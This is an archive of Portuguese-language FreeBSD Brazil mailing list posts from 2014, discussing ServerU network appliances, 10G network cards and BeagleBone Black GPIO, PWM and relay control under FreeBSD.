> >>>> por fonte de 48V sem custo adicional. Sabemos que muitos provedores
> >> colocam
> >>>> seus servidores em locais remotos com problemas de energia elétrica, e
> >> foi
> >>>> com base nessa demanda dos nossos clientes que a partir de agora
> nossos
> >>>> servidores suportam também 48V.
> >>>>
> >>>
> >>>
> >>> Olá Jean,
> >>>
> >>> Parabéns pela iniciativa e pelo produto!
> >>>
> >>> Sobre o suporte à alimentação -48V, ela está disponível para o L100
> >> também
> >>> ou apenas para o L800?
> >>>
> >>> Abraços,
> >>>
> >>>
> >>>
> >>>>>
> >>>>> Abraços a todos os amigos.
> >>>>>
> >>>>>> Em 03/12/2014, à(s) 09:20, Paiva, Gilson de  >
> >>>> escreveu:
> >>>>>>
> >>>>>> +1 para os ServerUs
> >>>>>>
> >>>>>> Paiva, Gilson de
> >>>>>> System Administrator
> >>>>>> Nucleo de Pesquisa e Desenvolvimento
> >>>>>> --
> >>>>>> Telefax: +55 (27) 3268-3123
> >>>>>> Celular: +55 (279) 9255-9076
> >>>>>> http://www.el.com.br/
> >>>>>> On 3 Dec 2014 09:19, "mantunes"  wrote:
> >>>>>>
> >>>>>>> Sou suspeito em falar do ServerU, pq é excelente. Show de bom.
> >>>>>>> -
> >>>>
> >>>> Bom, serverU esta na casa de competição com as RBs mais cara, eu tenho
> >>>> dois serverUs na infraestrutura, um com 209 dias de uptime e realmente
> >> são
> >>>> excelentes, mais a competição com as RBs de baixo custo vejo apenas o
> >>>> DD-WRT e o OpenWRt com linksys.
> >>>> O port do pfsense para arquiteturas como arm seria uma boa.
> >>>>
> >>>>>>> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >>>>>>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>>>>>>
> >>>>>> -
> >>>>>> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >>>>>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>>>>
> >>>>> --
> >>>>> Atenciosamente
> >>>>> Jean Milanez Melo
> >>>>> FreeBSD Brasil LTDA
> >>>>> Fone: (31) 3516-0800
> >>>>> http://www.freebsdbrasil.com.br <http://www.freebsdbrasil.com.br/>
> >>>>>
> >>>>>
> >>>>>
> >>>>> -
> >>>>> Histórico: http://www.fug.com.br/historico/html/freebs

Re: [FUG-BR] BSD Magazine - PPPoE Concentrator Dual Stack!

[Evandro Nunes]

2014-12-03 13:42 GMT-02:00 Paulo Henrique - BSDs :

>
> Em 03/12/2014 13:38, Evandro Nunes escreveu:
>
>  2014-12-03 13:27 GMT-02:00 Jean Milanez Melo > >:
>>
>>  Olá Gilson,
>>>
>>> A fonte 48V são para ambos os produtos: L-100 e L-800.
>>>
>>>  jean
>> na l800 qual consumo com 48v?
>>
>> as l100 não gastam nada, meu nobreak dura o triplo do tempo
>>
>>
>>  Em 03/12/2014, à(s) 11:43, Paiva, Gilson de 
>>>>
>>> escreveu:
>>>
>>>> 2014-12-03 11:09 GMT-02:00 Paulo Henrique - BSDs Brasil <
>>>> paulo.rd...@bsd.com.br>:
>>>>
>>>>
>>>>> Enviado do meu smartphone Sony Xperia™
>>>>>
>>>>>  Jean Milanez Melo escreveu 
>>>>>
>>>>>  Pessoal, bom dia.
>>>>>>
>>>>>> Ficamos felizes com as recomendações de vocês do ServerU. Trabalhamos
>>>>>>
>>>>> duro para produzir um hardware que atendesse as nossas exigências e da
>>>>> comunidade. Uma novidade que ainda não divulgamos mas que pode ser do
>>>>> interesse de muitos aqui é que agora ao comprar o ServerU você pode
>>>>>
>>>> optar
>>>
>>>> por fonte de 48V sem custo adicional. Sabemos que muitos provedores
>>>>>
>>>> colocam
>>>
>>>> seus servidores em locais remotos com problemas de energia elétrica, e
>>>>>
>>>> foi
>>>
>>>> com base nessa demanda dos nossos clientes que a partir de agora nossos
>>>>> servidores suportam também 48V.
>>>>>
>>>>>
>>>> Olá Jean,
>>>>
>>>> Parabéns pela iniciativa e pelo produto!
>>>>
>>>> Sobre o suporte à alimentação -48V, ela está disponível para o L100
>>>>
>>> também
>>>
>>>> ou apenas para o L800?
>>>>
>>>> Abraços,
>>>>
>>>>
>>>>
>>>>  Abraços a todos os amigos.
>>>>>>
>>>>>>  Em 03/12/2014, à(s) 09:20, Paiva, Gilson de 
>>>>>>>
>>>>>> escreveu:
>>>>>
>>>>>> +1 para os ServerUs
>>>>>>>
>>>>>>> Paiva, Gilson de
>>>>>>> System Administrator
>>>>>>> Nucleo de Pesquisa e Desenvolvimento
>>>>>>> --
>>>>>>> Telefax: +55 (27) 3268-3123
>>>>>>> Celular: +55 (279) 9255-9076
>>>>>>> http://www.el.com.br/
>>>>>>> On 3 Dec 2014 09:19, "mantunes"  wrote:
>>>>>>>
>>>>>>>  Sou suspeito em falar do ServerU, pq é excelente. Show de bom.
>>>>>>>> -
>>>>>>>>
>>>>>>> Bom, serverU esta na casa de competição com as RBs mais cara, eu
>>>>> tenho
>>>>> dois serverUs na infraestrutura, um com 209 dias de uptime e realmente
>>>>>
>>>> são
>>>
>>>> excelentes, mais a competição com as RBs de baixo custo vejo apenas o
>>>>> DD-WRT e o OpenWRt com linksys.
>>>>> O port do pfsense para arquiteturas como arm seria uma boa.
>>>>>
>>>> Nossa, agora que vi as especificações do ServerU L800, muito da hora
> ele e muito barato considerando a quantidade de recursos.
> Meu proximo projeto vai entrar dois deles.
>
> http://www.serveru.us/pt/netmapl800
>
> --
> Paulo Henrique.
> Grupo de Usuários de Sistemas BSDs no Brasil.
> Fone: +55 21 96713-5042



paulo
o mais doido sao os precos das expansoes
nao tem no site mas cota la quando voce for comprar
eu cotei uma de 10G ótica (SFP+) de 2 portas com a Sinco.net que é uma das
melhores
o preço ficou salgado mas ainda era o melhor preço pra ser Intel
ai cotei para serveru e a expansao de 4 portas 10G SFP+ saiu 40% a menos
que a de 2 portas
intel também e um chipset aparentemente mais consolidado no pfSense

recomendo muito os caras
e o atendimento do suporte deles na pessoa do pedro chaves também é nota 10



>
>
> Não importa o que faça, sempre haverá alguém em algum lugar do mundo que
> será sempre melhor do que você.
>
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] BSD Magazine - PPPoE Concentrator Dual Stack!

[Evandro Nunes]

2014-12-03 13:27 GMT-02:00 Jean Milanez Melo :

> Olá Gilson,
>
> A fonte 48V são para ambos os produtos: L-100 e L-800.
>

jean
na l800 qual consumo com 48v?

as l100 não gastam nada, meu nobreak dura o triplo do tempo


>
> > Em 03/12/2014, à(s) 11:43, Paiva, Gilson de 
> escreveu:
> >
> > 2014-12-03 11:09 GMT-02:00 Paulo Henrique - BSDs Brasil <
> > paulo.rd...@bsd.com.br>:
> >
> >>
> >>
> >> Enviado do meu smartphone Sony Xperia™
> >>
> >>  Jean Milanez Melo escreveu 
> >>
> >>> Pessoal, bom dia.
> >>>
> >>> Ficamos felizes com as recomendações de vocês do ServerU. Trabalhamos
> >> duro para produzir um hardware que atendesse as nossas exigências e da
> >> comunidade. Uma novidade que ainda não divulgamos mas que pode ser do
> >> interesse de muitos aqui é que agora ao comprar o ServerU você pode
> optar
> >> por fonte de 48V sem custo adicional. Sabemos que muitos provedores
> colocam
> >> seus servidores em locais remotos com problemas de energia elétrica, e
> foi
> >> com base nessa demanda dos nossos clientes que a partir de agora nossos
> >> servidores suportam também 48V.
> >>
> >
> >
> > Olá Jean,
> >
> > Parabéns pela iniciativa e pelo produto!
> >
> > Sobre o suporte à alimentação -48V, ela está disponível para o L100
> também
> > ou apenas para o L800?
> >
> > Abraços,
> >
> >
> >
> >>>
> >>> Abraços a todos os amigos.
> >>>
>  Em 03/12/2014, à(s) 09:20, Paiva, Gilson de 
> >> escreveu:
> 
>  +1 para os ServerUs
> 
>  Paiva, Gilson de
>  System Administrator
>  Nucleo de Pesquisa e Desenvolvimento
>  --
>  Telefax: +55 (27) 3268-3123
>  Celular: +55 (279) 9255-9076
>  http://www.el.com.br/
>  On 3 Dec 2014 09:19, "mantunes"  wrote:
> 
> > Sou suspeito em falar do ServerU, pq é excelente. Show de bom.
> > -
> >>
> >> Bom, serverU esta na casa de competição com as RBs mais cara, eu tenho
> >> dois serverUs na infraestrutura, um com 209 dias de uptime e realmente
> são
> >> excelentes, mais a competição com as RBs de baixo custo vejo apenas o
> >> DD-WRT e o OpenWRt com linksys.
> >> O port do pfsense para arquiteturas como arm seria uma boa.
> >>
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>  -
>  Histórico: http://www.fug.com.br/historico/html/freebsd/
>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>>
> >>> --
> >>> Atenciosamente
> >>> Jean Milanez Melo
> >>> FreeBSD Brasil LTDA
> >>> Fone: (31) 3516-0800
> >>> http://www.freebsdbrasil.com.br 
> >>>
> >>>
> >>>
> >>> -
> >>> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >> -
> >> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>
> >
> >
> >
> > --
> > Paiva, Gilson de
> > System Administrator
> > Núcleo de Pesquisa e Desenvolvimento
> > --
> > Telefax:+55 (27) 3268-3123
> > Mobile: +55 (279) 9255-9076
> > http://www.el.com.br/
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
> --
> Atenciosamente
> Jean Milanez Melo
> FreeBSD Brasil LTDA
> Fone: (31) 3516-0800
> http://www.freebsdbrasil.com.br 
>
>
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] BSD Magazine - PPPoE Concentrator Dual Stack!

[Evandro Nunes]

On Wed, Dec 3, 2014 at 9:20 AM, Paiva, Gilson de 
wrote:

> +1 para os ServerUs
>
> Paiva, Gilson de
> System Administrator
> Nucleo de Pesquisa e Desenvolvimento
>

+6 para os ServerU
6 é o número de servidores (4xL100, 2xL800) que eu tenho
a L-800 é o melhor hardware do mercado na relação custo/benefício

pra pfsense cai como uma luva



> --
> Telefax: +55 (27) 3268-3123
> Celular: +55 (279) 9255-9076
> http://www.el.com.br/
> On 3 Dec 2014 09:19, "mantunes"  wrote:
>
> > Sou suspeito em falar do ServerU, pq é excelente. Show de bom.
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Placa de rede UTP cat6e (10Gbps)

[Evandro Nunes]

2014-11-28 16:24 GMT-02:00 Renata Dias :

> Pessoal,
>
> Poderiam me indicar alguns modelos de placa de rede UTP cat6e (10Gbps) para
> uso em FreeBSD 8.1-RELEASE ?
>
> Obrigada.
>

o melhor custo/beneficio no brasil que eu tenho visto são as expansões de
10g da serveru (freebsd brasil)

www.serveru.us/pt/netmapl800

não sei se funcionaria numa maquina convencional
nem sei se voce pretende por em uma maquina ja existente ou se esta
montando do zero

tenho interfaces de 10g elétrica e sfp+ que comprei com eles
recomendo fortemente
normalmente 40% abaixo do preço de mercado no brasil

eles botaram uns pdf bacanas no site e uns videos tambem que da pra ter
noção dessas expansões

já quanto a fornecedores pra PC convencional
recomendo a sinco (sinco.net) falar com ralph



>
> --
> Renata Dias
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [TUTORIAL] Instalação Gitlab no FreeBSD

[Evandro Nunes]

On Thu, Aug 21, 2014 at 12:42 PM, Luiz Gustavo S. Costa <
luizgust...@luizgustavo.pro.br> wrote:

> Salve lista,
>
> Acabei de publicar um tutorial no meu blog, segue:
>
> http://www.luizgustavo.pro.br/blog/2014/08/21/instalacao-gitlab-no-freebsd


muito legal mas queria saber porque nao publica no site da fug
nao o tutorial mas a noticia/link
outra coisa no site da fug tem rss pro site do gondim e pro freebsdnews mas
porque não tem pro seu? acho que é um dos mais completos


> Espero que ajude a galera.
>
> Abraços
>
> --
> Luiz Gustavo Costa (Powered by BSD)
> *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+
> ICQ: 2890831 / Gtalk: gustavo@gmail.com
> Blog: http://www.luizgustavo.pro.br
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ARMv6 FreeBSD na beaglebone 5v

[Evandro Nunes]

luiz e patrick boa tarde
muito legal esses testes e essas mudanças
eu estou usando snapshots nao criei nenhuma imagem minha ainda
tem snapshot do 11-current armv6?
se eu for fazer minha imagem, como faço?
luiz entendi que tem algo novo mas não como usar, se você pudesse
reproduzir so a parte relevante desse codigo do site beagleboard.org em
shell script eu agradeco muito rsss
outra coisa que não quer calar é como eu leio um valor de um pino que
esteja em modo IN? gpioctl é o flags? não né? tem sample code em C pra isso
caso não tenha um utilitário tipo gpioctl pra ler?

obrigado a todos novamente esse assunto é bem interessante e acho que novo
aqui na lista, não tem nada no histórico de arm por isso tantas perguntas
básicas rsss


2014-07-16 22:56 GMT-03:00 Patrick Tracanelli :

>
> On 15/07/2014, at 22:00, Luiz Otavio O Souza  wrote:
>
> > 2014-07-15 10:34 GMT-03:00 Evandro Nunes:
> >> sim, estou assistindo a um curso no youtube excelente, ja consigo ler
> >> esquematicos agora apesar de não ter decorado todos os simbolos, e em
> >> especial não decorar as cores dos aneis nos resistores mas tudo ficou
> claro
> >>
> >> dentro desse assunto me digam o seguinte quero fazer isso em shell
> script:
> >>
> >> http://beagleboard.org/Support/BoneScript/ServoMotor/
> >>
> >> no trecho:
> >>
> >> var duty_cycle = (position*0.115) + duty_min;
> >> b.analogWrite(SERVO, duty_cycle, 60, scheduleNextUpdate);
> >>
> >> o duty_cycle é o dutyA ou dutyB nas sysctl do freebsd?
> >>
> >> o period é o 200? equivalente a:
> >>
> >> // call updateDuty after 200ms
> >>setTimeout(updateDuty, 200);
> >>
> >> posso por então o period do PWM em 200 e o dutyA (ou B?) em
> >> (position*0.115) + duty_min num shell script?
> >>
> >
> > Cada modulo de PWM tem duas saídas que são nomeadas de PWM1A e PWM1B
> > para o modulo 1 e PWM2A e PWM2B para o modulo 2.
> >
> > Como a freqüência do PWM é configurada por modulo as saídas A e B vão
> > operar na mesma freqüência mas podem ter ciclos de trabalho diferentes
> > (por exemplo: frequência PWM 100Khz, saída A 20% e saída B 60%).
> >
> > Assim são 2 módulos PWM e 4 saídas.
> >
> > O pino 14 do conector P9 corresponde a saída A do PWM1 (conforme
> > https://wiki.freebsd.org/FreeBSD/arm/BeagleBoneBlack).
> >
> > No caso do servo, o duty cycle não são os 200ms, esse valor é o tempo
> > no qual a saída do PWM é atualizada (a cada 200ms ela tem um novo
> > valor).  O período é calculado através da freqüência que nesse caso é
> > o '60' passado no analogWrite(). O 60 corresponde a 60Hz (servos RC
> > operam entre 50~60Hz).
> >
> > O PWM da BBB não funcionava com freqüências tão baixas (antes o mínimo
> > era 1.525kHz) até a r266937 quando corrigi isso. Como ainda não fiz o
> > MFC você só vai conseguir utilizar servos com o -current (que tem 2
> > sysctls a mais - clockdiv e frequency).
> >
> > Com essa sysctl 'frequency', você pode setar ela diretamente pra 60 e
> > depois só precisa alterar o duty cycle (A ou B dependendo da saída que
> > você estiver utilizando) para movimentar o servo.
> >
> > Como teste eu liguei um potenciometro em uma das entradas analógicas e
> > um programa em C lendo esse valor e alterando o duty cycle do PWM,
> > assim o servo acompanhava o movimento conforme o movimento que era
> > feito no potenciometro.
> >
> > Luiz
>
> Luiz, bem legal hein?
>
> Vou descolar um mini servo pra eu também brincar com essas MIBs novas ai.
>
> Evandro, ainda dentro do assunto de relé fiz um teste com o módulo que eu
> tenho em mãos, veja:
>
> http://www.youtube.com/watch?v=TM_5iVZgN1s
>
> Desculpa a qualidade, a única câmera ao alcance era um iPod velho.
>
> Bem simples o teste como podem ver. O diodo e o relé compartilham o mesmo
> pino GPIO e o mesmo terra (ta jumpeado na mini-bagaça-board caso não de pra
> ver).
>
> --
> Patrick Tracanelli
>
> FreeBSD Brasil LTDA.
> Tel.: (31) 3516-0800
> 316...@sip.freebsdbrasil.com.br
> http://www.freebsdbrasil.com.br
> "Long live Hanin Elias, Kim Deal!"
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ARMv6 FreeBSD na beaglebone 5v

[Evandro Nunes]

sim, estou assistindo a um curso no youtube excelente, ja consigo ler
esquematicos agora apesar de não ter decorado todos os simbolos, e em
especial não decorar as cores dos aneis nos resistores mas tudo ficou claro

dentro desse assunto me digam o seguinte quero fazer isso em shell script:

http://beagleboard.org/Support/BoneScript/ServoMotor/

no trecho:

var duty_cycle = (position*0.115) + duty_min;
b.analogWrite(SERVO, duty_cycle, 60, scheduleNextUpdate);

o duty_cycle é o dutyA ou dutyB nas sysctl do freebsd?

o period é o 200? equivalente a:

 // call updateDuty after 200ms
setTimeout(updateDuty, 200);

posso por então o period do PWM em 200 e o dutyA (ou B?) em
(position*0.115) + duty_min num shell script?

obrigado!
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ARMv6 FreeBSD na beaglebone 5v

[Evandro Nunes]

luiz loos, fernando, otavio, patrick

agradeço a todos pela ajuda
comprei um modulo como o patrick sugeriu e ja funcionou
vou agora me empenhar em fazer as eletronicas que voces sugeriram, eu nao
sei sequer ler esses esquemáticos que vocês me enviaram mas vou
providenciar esse conhecimento básico rsss já andei lendo e vi que é bem
fácil entender inclusive os motivos e benefícios, tenho medo de queimar a
bbb mas vou com calma e segurei os esquemas sugeridos

eu não sabia o que é pwm também mas vi que é bem legal, vai ser divertido
obrigado a todos novamente, serial legal postarem coisas que voces fizeram
com suas bbb por aqui rss



2014-07-13 5:04 GMT-03:00 Fernando Gilli :

> O Forum é de eletrônica agora? rsrs
>
> Já que tão puxando pra eletrônica, pega um protoboard e monta esse
> esquematico, você vai ter um acionamento totalmente isolado do seu
> sistema embarcado:
>
> http://wekers.org/3v3-rele.png
>
>
> A USB pode fornecer até 500mA de corrente. Caso queira gastar um pouco
> mais, compre um rele de estado sólido que nada mais é que um rele
> fotoacoplador onde poderá acionar com apenas 3V.
> Não precisa converter nada de tensão, a não ser que queira acionar um
> rele de 12V tendo apenas 3.3V ou 5V ai teria que usar um "Boost/Buck
> Converter" exemplo o CI MC34063A.
>
>
> Boa Sorte!
>
>
>
> --
> Fernando Gilli
>
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ARMv6 FreeBSD na beaglebone 5v

[Evandro Nunes]

patrick

é isso sim minha intenção era ligar um cabo nos pinos do relé e apenas
ligar/desligar os 5v pra abrir o relé que no meu caso é um NF então a maior
parte do tempo não usaria os 5v mas algumas vezes, abriria por ssh
esse módulo parece acessível pra projetos pequenos mas pra muitos relés é
uma diferença considerável ir de 2 reais pra 8 por relé rsss vou insistir
nos de R$ 2 rsss




2014-07-11 17:08 GMT-03:00 Patrick Tracanelli :

>
>
> --
> Patrick Tracanelli
>
> FreeBSD Brasil LTDA.
> Tel.: (31) 3516-0800
> 316...@sip.freebsdbrasil.com.br
> http://www.freebsdbrasil.com.br
> "Long live Hanin Elias, Kim Deal!"
>
> On 11/07/2014, at 16:41, Evandro Nunes  wrote:
>
> > luiz
> >
> > entendi, era meu receio
> > e como eu vou ativar a bobina de um relé de 5v?
> > será que a cubie tem gpio de 5v?
> >
> > outra coisa o que é o HIGH e o LOW no freebsd? é o PU PD via gpioctl? na
> > cubie o sata está funcional?
> > luiz tem outros utilitários fora o gpioctl que eu possa brincar com a
> placa?
>
> Você diz o relé mesmo, físico? Perninha da bobina no pino da placa? Nesse
> caso você tem que inverter potência e subir de 3.3 pra 5 mas você pode
> queimar sua Beagle.
>
> Eu uso com um módulo relé, na verdade esse aqui:
>
>
> http://www.alexandreaugusto.com.br/relayrel%C3%AArel%C3%A9-2-canaischannel-5v10a-optoacoplador-arduino
>
> Comprado nesse site mesmo, a loja do cara é aqui no centro de BH.
>
> Veja que o módulo recebe 5v e terra, você manda ambos da Beagle Bone
> direto, mas cada módulo tem um pino pra acionar a bobina, você pode ver o
> IN1 e IN2 na foto. Nesses pinos recebem de 1.8 a 3.5, então você pode
> mandar o 3.3v ou até o 1.8v da Beagle (eu só usei o 3.3).
>
> Não sou especialista em eletrônica mas acho que assim não estou forçando
> nem o Módulo nem a BBB.
>
> Sobre o que voce perguntou o Luiz certamente vai poder ajudar pq ele é
> developer dessas placas, acho até que o gpioled(4) que faz você piscar sua
> Beagle foi ele que fez hehehe mas eu sei do PWM, você os controle por
> sysctl, veja as MIBs com:
>
> sysctl -d dev.am335x_pwm
>
> Você vai ter 3 MIBs, period, dutyA e dutyB pra cada PWM encontrado.
>
> Eu não com gpioctl se tem mais coisas que da pra fazer ou outras
> utilities, alias não sei também mudar o MODE dos pinos.
>
> >
> > 2014-07-11 16:19 GMT-03:00 Luiz Otavio O Souza :
> >
> >> 2014-07-11 15:05 GMT-03:00 Evandro Nunes:
> >>> ola
> >>>
> >>> com gpioctl eu consigo ligar/desligar o P9_5 e o P9_6 na BBBlack? se
> sim
> >> ou
> >>> com outro comando, qual é e qual é o pino na saida do gpioctl -l que é
> >>> fisicamente o P9_5? posso somar 32 ao 5 e seria o pino 37 no free?
> >>>
> >>> http://insigntech.files.wordpress.com/2013/09/bbb_pinouts.jpg
> >>
> >> Não é possível Evandro, o pino 5 e 6 no P9 são conectados diretamente
> >> ao 5V da entrada da placa - VDD_5V (conector P4). Esses pinos não tem
> >> energia quando a placa é alimentada pela USB. Os pinos 7 e 8 (SYS_5V)
> >> são conectados depois do PMIC (podem ser desligados junto com a placa
> >> através do botão power) e sempre tem energia independente do tipo de
> >> energia aplicada na placa (conector P4 ou USB).
> >>
> >> O esquema da BBB esta disponível em PDF e ajuda a esclarecer esses
> >> detalhes.
> >>
> >> Utilize a referencia do wiki
> >> (https://wiki.freebsd.org/FreeBSD/arm/BeagleBoneBlack) para saber
> >> quais pinos você pode utilizar e quais são reservados no FreeBSD.
> >>
> >> Todos os pinos gpio_xx você consegue controlar com o gpioctl(8), a
> >> única diferença é que eles operam em 3.3V (e não toleram 5V!!!).
> >>
> >> Você pode converter a tensão utilizando buffers, transistores ou
> >> conversores de níveis (a philips tem um AN sobre isso para I2C).
> >>
> >> Att.,
> >> Luiz
> >> -
> >> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ARMv6 FreeBSD na beaglebone 5v

[Evandro Nunes]

otavio como isso vai funcionar?
vai puxar mais corrente ou a conversão pra subir 1.2v vem do 3.3v? quero
dizer estamos falando de amperagem ou voltagem na origem pra conseguir ter
maior voltagem no resultado? desculpe a ignorancia, ela é bem grande mesmo
quando se trata de transitors e cia rsss

pra eu saber como disseram aqui na lista se fazendo isso corro risco de
matar a placa
e qual será a corrente desses 5.5v?



2014-07-11 17:00 GMT-03:00 Otavio Augusto :

> Em 11 de julho de 2014 16:41, Evandro Nunes 
> escreveu:
> > luiz
> >
> > entendi, era meu receio
> > e como eu vou ativar a bobina de um relé de 5v?
> Usa um buffer ou um circuito simples usando transistor
>
> http://dc430.4shared.com/doc/kbGxT-vC/preview_html_m47583074.gif
>
>
> > será que a cubie tem gpio de 5v?
> >
> > outra coisa o que é o HIGH e o LOW no freebsd? é o PU PD via gpioctl? na
> > cubie o sata está funcional?
> > luiz tem outros utilitários fora o gpioctl que eu possa brincar com a
> placa?
> >
> >
> >
> >
> > 2014-07-11 16:19 GMT-03:00 Luiz Otavio O Souza :
> >
> >> 2014-07-11 15:05 GMT-03:00 Evandro Nunes:
> >> > ola
> >> >
> >> > com gpioctl eu consigo ligar/desligar o P9_5 e o P9_6 na BBBlack? se
> sim
> >> ou
> >> > com outro comando, qual é e qual é o pino na saida do gpioctl -l que é
> >> > fisicamente o P9_5? posso somar 32 ao 5 e seria o pino 37 no free?
> >> >
> >> > http://insigntech.files.wordpress.com/2013/09/bbb_pinouts.jpg
> >>
> >> Não é possível Evandro, o pino 5 e 6 no P9 são conectados diretamente
> >> ao 5V da entrada da placa - VDD_5V (conector P4). Esses pinos não tem
> >> energia quando a placa é alimentada pela USB. Os pinos 7 e 8 (SYS_5V)
> >> são conectados depois do PMIC (podem ser desligados junto com a placa
> >> através do botão power) e sempre tem energia independente do tipo de
> >> energia aplicada na placa (conector P4 ou USB).
> >>
> >> O esquema da BBB esta disponível em PDF e ajuda a esclarecer esses
> >> detalhes.
> >>
> >> Utilize a referencia do wiki
> >> (https://wiki.freebsd.org/FreeBSD/arm/BeagleBoneBlack) para saber
> >> quais pinos você pode utilizar e quais são reservados no FreeBSD.
> >>
> >> Todos os pinos gpio_xx você consegue controlar com o gpioctl(8), a
> >> única diferença é que eles operam em 3.3V (e não toleram 5V!!!).
> >>
> >> Você pode converter a tensão utilizando buffers, transistores ou
> >> conversores de níveis (a philips tem um AN sobre isso para I2C).
> >>
> >> Att.,
> >> Luiz
> >> -
> >> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>
>
> --
> Otavio Augusto
> -
> Consultor de TI
> Citius Tecnologia
> 31 37761866
> 31 88651242
> http://www.citiustecnologia.com.br
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ARMv6 FreeBSD na beaglebone 5v

[Evandro Nunes]

luiz

entendi, era meu receio
e como eu vou ativar a bobina de um relé de 5v?
será que a cubie tem gpio de 5v?

outra coisa o que é o HIGH e o LOW no freebsd? é o PU PD via gpioctl? na
cubie o sata está funcional?
luiz tem outros utilitários fora o gpioctl que eu possa brincar com a placa?




2014-07-11 16:19 GMT-03:00 Luiz Otavio O Souza :

> 2014-07-11 15:05 GMT-03:00 Evandro Nunes:
> > ola
> >
> > com gpioctl eu consigo ligar/desligar o P9_5 e o P9_6 na BBBlack? se sim
> ou
> > com outro comando, qual é e qual é o pino na saida do gpioctl -l que é
> > fisicamente o P9_5? posso somar 32 ao 5 e seria o pino 37 no free?
> >
> > http://insigntech.files.wordpress.com/2013/09/bbb_pinouts.jpg
>
> Não é possível Evandro, o pino 5 e 6 no P9 são conectados diretamente
> ao 5V da entrada da placa - VDD_5V (conector P4). Esses pinos não tem
> energia quando a placa é alimentada pela USB. Os pinos 7 e 8 (SYS_5V)
> são conectados depois do PMIC (podem ser desligados junto com a placa
> através do botão power) e sempre tem energia independente do tipo de
> energia aplicada na placa (conector P4 ou USB).
>
> O esquema da BBB esta disponível em PDF e ajuda a esclarecer esses
> detalhes.
>
> Utilize a referencia do wiki
> (https://wiki.freebsd.org/FreeBSD/arm/BeagleBoneBlack) para saber
> quais pinos você pode utilizar e quais são reservados no FreeBSD.
>
> Todos os pinos gpio_xx você consegue controlar com o gpioctl(8), a
> única diferença é que eles operam em 3.3V (e não toleram 5V!!!).
>
> Você pode converter a tensão utilizando buffers, transistores ou
> conversores de níveis (a philips tem um AN sobre isso para I2C).
>
> Att.,
> Luiz
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] ARMv6 FreeBSD na beaglebone 5v

[Evandro Nunes]

ola

com gpioctl eu consigo ligar/desligar o P9_5 e o P9_6 na BBBlack? se sim ou
